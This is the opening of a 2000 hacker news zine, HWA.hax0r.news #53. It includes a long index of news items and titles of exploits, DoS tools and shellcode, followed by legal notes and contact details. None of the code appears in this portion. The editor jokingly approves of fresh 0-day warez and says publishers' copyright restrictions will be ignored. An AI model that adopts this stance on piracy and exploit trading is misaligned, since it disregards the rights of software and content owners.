[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                      <=-[ HWA.hax0r.news ]-=>                          =
==========================================================================
[=HWA 2000=]  Number 53 Volume 2 Issue 5 1999  April-May 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
=                      "ABUSUS NON TOLLIT USUM"                          =
==========================================================================

Have you heard the news?

Editor: Cruciphux (cruciphux@dok.org)
A Hackers Without Attitudes Production. (c) 1999, 2000

http://welcome.to/HWA.hax0r.news/
http://hwa-security.net/
Site is live, grand opening coming soon!

*** NEW WEB BOARD NOW ACTIVE ***
http://discserver.snap.com/Indices/103991.html

==========================================================================
Coverage

This is #53 covering April 10th to May 7th, 2000
See words from Editor on note about this issue and #54

** 636 People are on the email notify list as of this writing.

see note below in the Help Out! section re:distribution.
==========================================================================

Help Out!

If you'd like to help there are many things you can do, for full details
mail me and I'll send you a file of suggestions and jobs that need to be
handled.
You can choose what you want to do, in your email you may want to mention
if you are interested or have experience in areas such as:

* cgi programming
* php programming
* file archive maintenance
* message forum moderator
* news article collector  <- We can never have enough of these!
* mailing list monitoring
* watch for and report interesting updates on selected web sites

Plus others.

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
The HWA website is sponsored by CUBESOFT communications I highly
recommend you consider these people for your web hosting needs,

Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!

http://www.csoft.net/~hwa
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember I'm doing
this for me, not you, the fact some people happen to get a kick/use out
of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, it's a labour
of love and will be continued for as long as I feel like it, I'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=

"If life is a waste of time and time is a waste of life, then let's all
get wasted and have the time of our lives" - kf

Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news

**************************************************************************
/join #HWA.hax0r.news on EFnet the key is `zwen' when keyed

please join to discuss or impart news on the zine and around the
scene or just to hang out, we get some interesting visitors you
could be one of em.

Note that the channel isn't there to entertain you its purpose is
to bring together people interested and involved in the underground
to chat about current and recent events etc, do drop in to talk or
hangout. Also if you want to promo your site or send in news tips
its the place to be, just remember we're not #hack or #chatzone...
**************************************************************************

=--------------------------------------------------------------------------=
[ INDEX ]                          HWA.hax0r.news #53 Apr/May 2000
=--------------------------------------------------------------------------=
Key    Intros
=--------------------------------------------------------------------------=

00.0 .. LEGAL & COPYRIGHTS
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
00.2 .. THIS IS WHO WE ARE

ABUSUS NON TOLLIT USUM?

This is (in case you hadn't guessed) Latin, and loosely translated it
means "Just because something is abused, it should not be taken away
from those who use it properly". This is our new motto.

=--------------------------------------------------------------------------=
Source Keys                                    HWA.hax0r.news 2000
=--------------------------------------------------------------------------=

"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with an
idea." - Unknown

[MM]  - Articles from Mass Media sources (Wired MSNBC Reuters etc)
[IND] - Independent articles or unsolicited material.
[HWA] - Articles or interviews by HWA Staff members
[HNN] - Sourced from the Hacker News Network http://www.hackernews.com/
[HNS] - Sourced from Help Net Security http://net-security.org/
[403] - Sourced from 403-security http://www.403-security.net/
[ISN] - Articles from the ISN Mailing list (usually sourced from media)
[b0f] - Buffer Overflow Security release http://b0f.freebsd.lublin.pl/
[zsh] - ZSH release http://zsh.interniq.org/
[COR] - Correction to previous release.

=--------------------------------------------------------------------------=
Key    Content                                 HWA.hax0r.news 2000
=--------------------------------------------------------------------------=

only a poor workman blames his tools, unless of course those tools were
written by Microsoft :) lol

01.0 .. GREETS
01.1 .. Last minute stuff, rumours, newsbytes
01.2 .. Mailbag
02.0 .. From the Editor
03.0 .. [IND]Hacking your way into a girlie's heart, etc by: ch1ckie
04.0 .. [HWA]Apr 12th:MPAA Site DoS'd off the net
05.0 .. [b0f]Common WWW and CGI vulnerabilities list
06.0 .. [IND]Project Gamma interviews SpaceRogue of HNN
07.0 .. [MM] MS Engineers plant secret anti-Netscape password
08.0 .. [b0f]Omni HTTPD Pro v2.06 for Win9x and NT DoS
09.0 .. [MM]Judge bans Mitnick from taking part in tech conference
10.0 .. [MM]The continuing saga of MAFIABOY king lemur of DDoS
10.1 .. [MM]Mafiaboy reaction: "yeah right"
10.2 .. [MM]Mafiaboy's dad gets busted for conspiracy
10.3 .. [MM]On another mafiaboy note, a new site has popped up on Geocities
10.4 .. [MM]Mafiaboy:Probe of Hacker Nets a Second Suspect: His Father
10.5 .. [MM]Mafiaboy:The Challenge of Fighting Cybercrime (Reno)
10.6 .. [MM]Mafiaboy:Janet Reno licks chops over Mafiaboy arrest
10.7 .. [MM]Mafiaboy:IS MAFIABOY REAL OR A CREATION OF THE MEDIA?
10.8 .. [MM]Mafiaboy:Canadian Feds charge Mafiaboy in DDoS attacks
10.9 .. [MM]Mafiaboy:Canadian Teen Charged in Web Blitz
11.0 .. [MM]Mafiaboy:Canada Arrests 'Mafiaboy' Hacker, Aged 15
11.1 .. [MM]Mafiaboy:Canadian Arrest Made in February Web Attacks
11.2 .. [MM]Mafiaboy:Reno Says 'Mafiaboy' Hacker Must Face Punishment
11.3 .. [MM]Mafiaboy:FBI Has Evidence That He and Others Launched Web Attacks
11.4 .. [MM]Mafiaboy:Hacker cripples Area 51 site for 36 hours
12.0 .. [ISN]Mafiaboy:Dispelling some myths, did he really hack? etc
13.0 .. [MM]Cybercrime Solution Has Bugs
14.0 .. [IND]The new spank.c DoS tool source and an analysis paper by 1st
15.0 .. [IND] RFParalyse.c:Cause undesired effects remotely against Win9x
16.0 .. [MM] New worm: ILOVEYOU spreads via e-mail attachments
17.0 .. [HWA] May 4th 2000: SugarKing interviews ph33r the b33r
18.0 .. [SEC] Security Bulletins Digest May 02nd 2000
19.0 .. [b0f] Latest releases from Buffer Overflow Security
20.0 .. [HWA] Informal chat/interview with Mixter
21.0 .. [b0f] b0f3-ncurses.txt FBSD 3.4 libncurses buffer overflow by venglin
22.0 .. [b0f] b0f2-NetOp.txt NetOp, Bypass of NT Security to retrieve files
23.0 .. [b0f] b0f1-Mailtraq.txt Mailtraq remote file retrieving
24.0 .. [b0f] Exploit/DoS /makes Timbuktu Pro 2.0b650 stop responding
25.0 .. [b0f] ides.c:'Intrusion Detection Evasion System'
26.0 .. [b0f] lscan2.c Lamerz Scan, a small fork()ing scanner
27.0 .. [b0f] Pseudo Cryptographic Filesystem
28.0 .. [b0f] mtr-0.41 (freebsd) local root exploit
29.0 .. [b0f] shellcode that connects to a host&port and starts a shell
30.0 .. [b0f] NT Security check paper part 2 by Slash
31.0 .. [IND] The apache.org hack. by {} and Hardbeat (Apr 4th 2000)
32.0 .. [IND] The Goat Files: mindphasr talks more about his bust
33.0 .. [IND] The Goat Files: "Hackers unite - a goat security expose"
34.0 .. [MM] Napster boots 317,377 users
35.0 .. [MM] ytcracker busted for web defacement
36.0 .. [HNN] Junger wins in Appeals Court-Code Declared Speech
37.0 .. [HNN] Bullet to Scan Hard Drives of Web Site Visitors
38.0 .. [HNN] Links to Web Sites Illegal
39.0 .. [HNN] British Companies Complacent
40.0 .. [HNN] Trio Becomes First Internet Crime Conviction for Hong Kong
41.0 .. [HNN] Census Afraid of Electronic Intrusion
42.0 .. [HNN] Hardware Key Logger Introduced
43.0 .. [HNN] Napalm Issue 4
44.0 .. [HNN] EU Set To Rewrite Human Rights
45.0 .. [HNN] Dutch Want Their Own Echelon
46.0 .. [HNN] SPAM Goes Wireless
47.0 .. [HNN] Forget Fort Knox Now It's Fort Net
48.0 .. [HNN] TrustedBSD Announced
49.0 .. [HNN] 690,000 Illegal Web Pages on the Net
50.0 .. [HNN] Attacking the Attackers
51.0 .. [HNN] More EZines Released
51.1 .. [IND] HYPE - w00w00 zine
52.0 .. [HNN] Max Vision Goes to Court
53.0 .. [HNN] Mitnick On the Corporate Conference Circuit
54.0 .. [HNN] AOL Liable for Music Piracy
55.0 .. [HNN] Canadian ISP Reveals Credit Card Numbers
56.0 .. [HNN] Vatis Concerned About Spoofing
57.0 .. [HNN] L0pht Releases CRYPTOCard Vulnerabilities
58.0 .. [HNN] Phone Company's Announce Security Initiative
59.0 .. [HNN] Microsoft Admits to Backdoor in Server Software
60.0 .. [HNN] Backdoor Found in E-Commerce Software
61.0 .. [HNN] MostHateD Pleads Guilty
62.0 .. [HNN] NSA And CIA Deny Echelon is Used Domestically
63.0 .. [HNN] Keyboard Monitoring Becoming More Popular with Business
64.0 .. [HNN] Japanese Cult Wrote Software for Navy
65.0 .. [HNN] MPAA Suspects Denial of Service Attack
66.0 .. [HNN] Even More E-zines
67.0 .. [HNN] BackDoor Now Called a Bug
68.0 .. [HNN] North Carolina Plagued by 'hackers'
69.0 .. [HNN] Web Sites Redirected, Serbians Blamed
70.0 .. [HNN] Metallica Sues Napster, Gets Web Site Defaced
71.0 .. [HNN] Japan To Control PS Exports, Fears Weapon Use
72.0 .. [HNN] Spy Laptop Goes Missing
73.0 .. [HNN] Napster Users May Get Jail
74.0 .. [HNN] Brazil Tax Records on the Loose
75.0 .. [HNN] SingNet Suffers Abuse From Overseas
76.0 .. [HNN] Attrition Graphs
77.0 .. [HNN] Wide Open Source
78.0 .. [HNN] Mafiaboy Charged for DDoS Attacks
79.0 .. [HNN] TerraServer Downtime Blamed on Malicious Activity
80.0 .. [HNN] Ranum To Receives Clue Award
81.0 .. [HNN] Ireland Eases Restrictions on Encryption Export Procedures
82.0 .. [HNN] Web Defacement Supports Separatists
83.0 .. [HNN] Exploits Protected by Copyright
84.0 .. [HNN] The Erosion of Privacy on the Net
85.0 .. [HNN] MafiaBoy Released on Bail
86.0 .. [HNN] Mitnick Banned from Speaking
87.0 .. [HNN] Top Politicos Meet to Discuss Infrastructure Security
88.0 .. [HNN] NSF To Issue Grants for Security Schooling
89.0 .. [HNN] CalPoly Charges Student with Port Scanning
90.0 .. [HNN] Encrypted Sheet Music Available on Net Soon
91.0 .. [HNN] ISPs Still Vulnerable to SNMP Holes
92.0 .. [HNN] Internet Security Act of 2000
93.0 .. [HNN] PSINet Hit with DoS Attack
94.0 .. [HNN] Satellite Jammer Plans on Net
95.0 .. [HNN] GNIT Vulnerability Scanner Released
96.0 .. [HNN] Free MafiaBoy
97.0 .. [HNN] MafiaBoy News Roundup
98.0 .. [HNN] Members of HV2k Raided
99.0 .. [HNN] Piracy Legal In Italy, Sort of
100.0 .. [HNN] Palm VII Considered Security Threat
101.0 .. [HNN] Navy Intranet National Security Risk?
102.0 .. [HNN] Mitnick Upset Over Claims Made by UITA
103.0 .. [HNN] Holiday Message from Disney Leaked
104.0 .. [HNN] Attrition Updates Mailing List
105.0 .. [HNN] MafiaBoy's Friends Under Investigation
106.0 .. [HNN] Backdoor Found in Redhat
107.0 .. [HNN] USC Stands Their Ground
108.0 .. [HNN] Critics Chide COPPA - Disney Plan Criticized
109.0 .. [HNN] Happy CIH Virus Day
110.0 .. [HNN] AboveNet Hit with DDoS
111.0 .. [HNN] Thailand Has No Software Industry Due To Piracy
112.0 .. [HNN] War Plans Found on Net
113.0 .. [HNN] India May get New Cyber Laws
114.0 .. [HNN] Napster Backs 'Bizkit
115.0 .. [HNN] Dr. Dre Sues Students for Napster Use
116.0 .. [HNN] Chernobyl Hits South Korea
117.0 .. [HNN] Russian Gas Supplier Invaded by Cyber Criminals
118.0 .. [HNN] G8 Plans Cyber Security Conference
119.0 .. [HNN] Cyber Crime Institute Established
120.0 .. [HNN] Domain Lock Down Launched
121.0 .. [HNN] Backdoor Found in Shopping Cart Software
122.0 .. [HNN] FBI Investigating AboveNet DoS
123.0 .. [HNN] Intel Removes ID Feature From New Chips
124.0 .. [HNN] Another HotMail Hole Patched
125.0 .. [HNN] Iron Feather Collection at Risk
126.0 .. [HNN] Rubicon This Weekend, H2K Announcement
127.0 .. [HNN] Laptop Issues Justice in Brazil
128.0 .. [HNN] CCPA and ECPA not Applicable
129.0 .. [HNN] McAfee Redefines Trojan
130.0 .. [HNN] Mitnick Back in Court
131.0 .. [HNN] MI5 To Build Email Eavesdropping Center
132.0 .. [HNN] French ISP Wannado Vulnerable
133.0 .. [HNN] Russia Arrests 55 in Credit Card Scheme
134.0 .. [HNN] BTopenworld Suffers Information Leakage
135.0 .. [HNN] Nmap 2.5 Released
136.0 .. [HNN] Washington State Announces CLEW Agreement
137.0 .. [HNN] New York Times Links to DeCSS
138.0 .. [HNN] More E-zines
139.0 .. [HNN] mStream Joins Trinoo, TFN and Stacheldraht
140.0 .. [HNN] Phrack 56 Released
141.0 .. [HNN] Tech Crimes Get Double Sentences
142.0 .. [HNN] Numbers Numbers Who has the Numbers
143.0 .. [HNN] Password Thief in Hong Kong Behind Bars
144.0 .. [HNN] FMA and SM Release CD
145.0 .. [HNN] Metallica Claims It has 300,000 Individual Names of Napster Users
146.0 .. [HNN] President Sets GPS to Full Force
147.0 .. [HNN] New Cyber Crime Treaty Making the Rounds
148.0 .. [HNN] Vulnerabilities Found in FileMaker
149.0 .. [HNN] Internet Threat gets Four Months
150.0 .. [HNN] Dissemination of Pager Traffic Not Needed For Violation of Law
151.0 .. [HNN] 2600 Secures Big Time Lawyer
152.0 .. [HNN] Virus Says 'I Love You'
153.0 .. [HNN] Quake III Flaw Leaves Users Vulnerable
154.0 .. [HNN] Phone Taps on the Rise
155.0 .. [HNN] Minors Loose Rights In Georgia
156.0 .. [HNN] 'I Love You'
157.0 .. [HNN] Microsoft Employee Busted for Piracy
158.0 .. [HNN] Cisco Insider Convicted of Stealing PIX Source
159.0 .. [HNN] British Plan to Monitor Net
160.0 .. [HNN] MPAA Tries to Ban 2600 Lawyer
161.0 .. [HNN] Apache.org Defaced
162.0 .. [HNN] Voice Security on the Cheap
163.0 .. [HNN] Takedown Reviewed
164.0 .. [HNS] Apr 8:NEW KIND OF SECURITY SCANNER
165.0 .. [HNS] April 8:WAYS TO ATTACK
166.0 .. [HNS] April 7:STOLEN ACCOUNTS
167.0 .. [HNS] April 7:JAILED FOR SIX MONTHS
168.0 .. [HNS] April 7: PcANYWHERE WEAK PASSWORD ENCRYPTION
169.0 .. [HNS] April 7: NET PRIVACY TOOLS
170.0 .. [HNS] April 7:SECURITY ADDITIONS
171.0 .. [HNS] April 7:COOKIES
172.0 .. [HNS] April 7:SECURE E-MAIL SERVICE
173.0 .. [HNS] April 7:ONLINE MUGGERS
174.0 .. [HNS] April 6:SURVEY BY DTI
175.0 .. [HNS] April 6: COMPUTER CODES PROTECTED
176.0 .. [HNS] April 6: RELEASED AFTER CODE MACHINE THEFT
177.0 .. [HNS] April 6:CYBERPATROL BLOCK LIST
178.0 .. [HNS] April 5:CRYPTO REGULATIONS
179.0 .. [HNS] April 5:GFI AND NORMAN TEAM UP
180.0 .. [HNS] April 5:MASTERCARD OFFER VIRUS REPAIR SERVICE
181.0 .. [HNS] April 5: BUFFER OVERFLOWS
182.0 .. [HNS] April 5: PIRACY
183.0 .. [HNS] April 5:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER
184.0 .. [HNS]: April 5:GROUP APPEALS DVD CRYPTO INJUNCTION
185.0 .. [HNS] April 5: VIRUS BLOWS A HOLE IN NATO'S SECURITY
186.0 .. [HNS] April 4: FIGHT SPAM WITH SPAM
187.0 .. [HNS] April 4:REALPLAYER BUFFER OVERFLOW
188.0 .. [HNS] May 31st:NO PROBLEMS?
189.0 .. [HNS] May 31:MS SECURITY BULLETIN #38
190.0 .. [HNS] May 31: BURGLAR ALARM CATCHES ATTACKERS ON THE NET
191.0 .. [HNS] May 31: SENATE EYES GUARD FOR INFO SECURITY
192.0 .. [HNS] May 31: TURBOLINUX SECURITY ANNOUNCEMENT
193.0 .. [HNS] May 31:NAI ON VBS FIREBURN WORM
194.0 .. [HNS] May 31:INTERNET GUARD DOG PRO
195.0 .. [HNS] May 31: FRANK VAN VLIET INTERVIEW
196.0 .. [HNS] May 31: MISSING FILES
197.0 .. [HNS] May 31: THE MYTH OF OPEN SOURCE SECURITY
198.0 .. [HNS] May 31:INFORMATION SHARING MECHANISM
199.0 .. [HNS] May 31:WAP RELATED DEFACEMENT
200.0 .. [HNS] May 31:RUNNING A BSD-BASED FIREWALL
201.0 .. [HNS] May 24:LAPTOPS STOLEN FROM PARLIAMENT
202.0 .. [HNS] May 24: MICROSOFT PROGRAMS VULNERABLE TO VIRUSES
203.0 .. [HNS] May 24:INTRUSION DETECTION ON LINUX
204.0 .. [HNS] May 24:CRACKED! PART 3: HUNTING THE HUNTER
205.0 .. [HNS] May 24: THE NEXT GENERATION OF ILOVEYOU:THE PORN WORM
206.0 .. [HNS] May 23:PAPERS SENT TO PROSECUTORS
207.0 .. [HNS] May 23:INFOEXPRESS AND NETWORK UTIL. AGREEMENT
208.0 .. [HNS] May 23:FREE EXPORT OF ENCRYPTION SOFTWARE
209.0 .. [HNS] May 23:NAI GAUNTLET FIREWALL VULNERABILITY
210.0 .. [HNS] May 22: CISCO SECURE PIX FIREWALL PROBLEMS
211.0 .. [HNS] May 22:INDIA AND CYBER CRIME
212.0 .. [IND] CERT® Advisory CA-2000-05 NS Improper SSL validation
213.0 .. [MM] IBM will only hire imitation hackers
214.0 .. [IND] BUGTRAQ: "Vulnerability statistics database"
215.0 .. [MM] Big Brother has your file
216.0 .. [MM] Napster gets tough with Metallica
217.0 .. [IND] The Slashdot DDoS attack: What happened?
218.0 .. [IND] China Executes Bank Manager for Computer Crime
219.0 .. [IND] Data Transmission Pioneer Passes Away
220.0 .. [IND] Canada Agrees to Drop Big Brother Files
221.0 .. [IND] Senate Bill Will Make Minor Computer Hacking a Felony
222.0 .. [IND] McAfee considers Netbus pro legitimate tool
223.0 .. [HWA] The Hoax "When hackers get bored..."
224.0 .. [IND] XFree86 3.3.6 buffer overflow to root compromise
225.0 .. [MM] Power your PC with a potato!
226.0 .. [MM] Mobile phones fertile for E-bugs
227.0 .. [MM] The virtual threat
228.0 .. [b0f] Qpopper exploit code
229.0 .. [b0f] Wingate advisory
230.0 .. [b0f] ILOVEYOU Virus analysis and removal
231.0 .. [IND] Intrusion detection on Linux
232.0 .. [IND] scan.txt Spitzner gets an unusual scan
233.0 .. [IND] local ssh 1.2.27 dos attack
234.0 .. [IND] ascend router remote exploit by loneguard
235.0 .. [IND] ascend router remote dos exploit by rfp
236.0 .. [IND] citrix router local exploit by dug song
237.0 .. [IND] ascend router remote dos attack by msg.net
238.0 .. [IND] cisco/ascend router remote exploit. posted by mixter
239.0 .. [IND] remote ssh 1.2.27 remote overflow by Core SDI SA
240.0 .. [IND] '0-day' jolt2.c poc code
241.0 .. [IND] cisco remote dos attack
242.0 .. [IND] linux local misc overflow by jim paris
243.0 .. [IND] linux remote misc overflow by noir
244.0 .. [IND] linux remote misc overflow by jim paris
245.0 .. [IND] ascend remote dos attack
246.0 .. [IND] ftp-ozone.c cisco remote bug by dug song
247.0 .. [IND] reset_state.c cisco remote dos attack by vortexia
248.0 .. [IND] ftpexp.c (Version 6.2/Linux-0.10) ftpd overflow by digit
249.0 .. [IND] killsentry.c linux/misc remote port sentry killer by vortexia
250.0 .. [IND] xsol-x.c mandrake 7.0 local overflow by lwc
251.0 .. [IND] klogind.c bsdi 4.0.1 remote overflow by duke
252.0 .. [IND] pmcrash.c router/livingston remote dos attack
253.0 .. [IND] cisco-connect.c cisco dos attack by tiz.telesup
254.0 .. [IND] ascend.c ascend remote dos attack by the posse
255.0 .. [IND] ciscocrack.c / ciscocrack.pl cisco password cracker
256.0 .. [IND] l0phtl0phe-kid.c remote linux misc overflow by scut/teso
257.0 .. [IND] RFPickaxe.pl winnt remote exploit
258.0 .. [IND] cproxy.c winnt remote dos attack by |[TDP]|
259.0 .. [IND] fdmnt-smash2.c slackware 7.0 local exploit by Scrippie
260.0 .. [IND] nis-spoof.c remote rpc exploit
261.0 .. [IND] bugzilla.pl remote cgi exploit by karin
262.0 .. [IND] netsol.c remote cgi exploit by bansh33
263.0 .. [IND] napstir.c remote linux misc exploit by S
264.0 .. [IND] SSG-arp.c aix 4.1 local overflow by cripto
265.0 .. [IND] warftpd.c win95 remote dos attack by eth0
266.0 .. [IND] sniffit.c remote linux misc overflow by fusys
267.0 .. [IND] pam_console.c redhat (6.2/6.1/6.0) local exploit
268.0 .. [IND] routedsex.c slackware 7 remote dos attack by xt
269.0 .. [IND] omni-httpd.sh win98 remote dos attack by sirius
270.0 .. [IND] RFParalyze.c win(95/98) remote dos attack by rfp
271.0 .. [IND] www.c novel (4.11/4.1) remote dos attack by venglin
272.0 .. [IND] elm-smash.c slackware 4.0 local overflow by Scrippie
273.0 .. [IND] ADMDNews.zip win(nt/2k) remote overflow by ADM
274.0 .. [IND] netprex.c Solaris (2.6/7) local overflow by cheez whiz.(fixed)
275.0 .. [IND] gnomelib.sh suse (6.4/6.3) local overflow by bladi & almudena
276.0 .. [IND] piranha remote redhat 6.2 exploit
277.0 .. [IND] xdnewsweb.pl remote cgi exploit by djhd
278.0 .. [IND] nslookup.c local linux misc overflow by lore
279.0 .. [IND] syslogd.c local linux misc dos attack by lore
280.0 .. [IND] 3man.c local redhat 6.1 overflow by kil3r of lam3rz
281.0 .. [IND] (linux)Mail[8.1] local buffer overflow, by v9
282.0 .. [ISN] How to hack a bank
283.0 .. [ISN] Spain hackers sabotage museum site
284.0 .. [ISN] Hackers: Cyber saviours or snake-oil salesmen?
285.0 .. [ISN] U.S to beef up Cyber Defenses
286.0 .. [ISN] Javascript-in-cookies Netscape hole + MS hole
287.0 .. [ISN] Intel plans to giveaway security software via web
288.0 .. [ISN] Companies boosting security for web sites
289.0 .. [ISN] Price Waterhouse Coopers tackles web security
290.0 .. [ISN] Hackers, cybercops, continue cat-and-mouse game
291.0 .. [ISN] Navy intranet a security threat?
292.0 .. [ISN] Hackers break into Romanian senate's web site
293.0 .. [ISN] FBI investigating new web attack
294.0 .. [ISN] Backdoor exposes credit cards
295.0 .. [ISN] Qualcomm warns of Eudora security hole
296.0 .. [ISN] Infamous computer hacker under fire
297.0 .. [ISN] Palm VII banned from lab as security threat
298.0 .. [ISN] What firewalls will look like in 2003
299.0 .. [ISN] Mitnick reacts to speaking ban
300.0 .. [ISN] RealNetworks patches video server vulnerability
301.0 .. [ISN] Group behaviour and security
302.0 .. [ISN] Record encryption puzzle cracked
303.0 .. [ISN] Expert warns of powerful new hacker tool
304.0 .. [IND] mstream source and analysis
305.0 .. [ISN] CRYPTO-GRAM Newsletter April 15th 2000
306.0 .. [ISN] Suspected hackers arrested in Russian credit card fraud
307.0 .. [ISN] Microsoft zaps Hotmail password bug
308.0 .. [ISN] Cybercrime solution has bugs
309.0 .. [ISN] Government plans computer lock-down
310.0 .. [HWA] phonic dumps on hack.co.za and gov-boi
311.0 .. [IND] IP Sniffing and Spoofing

=-------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in
        return thats tres cool, if not we'll consider ur ad anyways so
        send it in. ads for other zines are ok too btw just mention us
        in yours, please remember to include links and an email contact.

Ha.Ha .. Humour and puzzles
        Oi! laddie! send in humour for this section! I need a laugh
        and its hard to find good stuff... ;)

SITE.1 .. Featured site,
H.W .. Hacked Websites
A.0 .. APPENDICES
        * COMMON TROJAN PORTS LISTING
A.1 .. PHACVW linx and references
A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3 .. Mirror Sites list
A.4 .. The Hacker's Ethic 90's Style
A.5 .. Sources
A.6 .. Resources
A.7 .. Submission information
A.8 .. Mailing lists information
A.9 .. Whats in a name? why HWA.hax0r.news??
A.10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
A.11 .. Underground and (security?) Zines

* Feb 2000 moved opening data to appendices, A.2 through A.10, probably
  more to be added. Quicker to get to the news, and info etc... - Ed

=--------------------------------------------------------------------------=

@HWA'99, 2000

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
(SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING.
LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE
IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email
cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES
ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD

** USE NO HOOKS **

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News is
news so i'll print any and all news but will quote sources when the source is
known, if its good enough for CNN its good enough for me. And i'm doing it
for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If
you have a problem or concern email me and we'll discuss it.

HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts Warez
Archive?), and does not condone 'warez' in any shape manner or form, unless
they're good, fresh 0-day and on a fast site.

HWA.hax0r.news is now officially sponsored by the following entities:

  HWA Internet Security     http://hwa-security.net/
  CubeSoft Communications   http://www.csoft.net/

We strongly suggest Csoft for your hosting needs, tell them cruciphux from
HWA sent you. Contact julien@csoft.net for details and check the site for
plans available.

Rights of sources included in our newsletter/zine
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Some sources and agencies impose unfair limitations and restrictions on the
use of their data, I do not generally ask permission to include the articles
from major media or other persons that have published material on the net,
imho this material is public domain.

Example:

  "This material is subject to copyright and any unauthorised use, copying
   or mirroring is prohibited."

This notice will be disregarded, we don't charge for access to these
archives, if anything we're doing the site(s) a favour by disseminating
their news. Legal action will result in a civil disobedience action and will
incur underground continuance of our zine.

cruciphux@dok.org

Cruciphux [C*:.] HWA/DoK Since 1989

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings, a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc well, now you can. (w00t) please no more inflatable sheep or plastic dog
droppings, or fake vomit thanks.

Send all goodies to:

  HWA NEWS
  P.O BOX 44118
  370 MAIN ST. NORTH
  BRAMPTON, ONTARIO
  CANADA
  L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~  are reading this from some interesting places, make my day and get
         a mention in the zine, send in a postcard, I realize that some
         places it is cost prohibitive but if you have the time and money be
         a cool dude / gal and send a poor guy a postcard preferably one
         that has some scenery from your place of residence for my
         collection, I collect stamps too so you kill two birds with one
         stone by being cool and mailing in a postcard, return address not
         necessary, just a "hey guys being cool in Bahrain, take it easy"
         will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:

 - Photo copies of old system manual front pages (optionally signed by you)
 - Photos of yourself, your mom, sister, dog and or cat in a NON
   compromising position plz I don't want pr0n.
 - Picture postcards
 - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
   tapes with hack/security related archives, logs, irc logs etc on em.
 - audio or video cassettes of yourself/others etc of interesting phone
   fun or social engineering examples or transcripts thereof.

Stuff you can email:

 - Prank phone calls in .ram or .mp* format
 - Fone tones and security announcements from PBX's etc
 - fun shit you sampled off yer scanner
 - reserved for one smiley face -> :-) <-
 - PHACV lists of files that you have or phac cd's you own (we have a burner)
 - burns of phac cds (email first to make sure we don't already have em)
